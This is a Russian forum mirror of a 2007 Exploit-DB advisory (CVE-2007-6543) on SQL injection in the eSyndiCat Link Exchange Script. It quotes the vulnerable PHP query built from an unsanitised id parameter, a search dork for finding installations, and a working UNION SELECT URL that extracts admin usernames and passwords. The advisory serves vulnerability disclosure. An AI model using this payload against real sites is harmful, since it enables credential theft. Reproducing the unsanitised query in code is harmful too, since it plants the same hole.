- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4791
- Проверка EDB
-
- Пройдено
- Автор
- EGIX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6543
- Дата публикации
- 2007-12-25
Код:
--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330. }
[*] An attacker can break database through browser! P.o.C. :
http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*
# milw0rm.com [2007-12-25]- Источник
- www.exploit-db.com
